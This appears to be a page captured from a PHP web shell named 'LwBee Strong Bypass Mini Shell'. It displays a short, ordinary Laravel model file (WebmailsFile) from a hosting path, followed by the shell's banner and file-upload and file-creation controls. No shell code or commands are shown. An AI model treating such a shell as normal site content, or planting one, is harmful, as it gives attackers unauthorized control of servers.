/home/storage/f/3f/a5/aloic1/public_html/core/app/Models/WebmailsFile.php
<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Model;

class WebmailsFile extends Model
{
    use HasFactory;

    public function webmails()
    {
        return $this->hasMany('App\Models\Webmail', 'group_id');
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File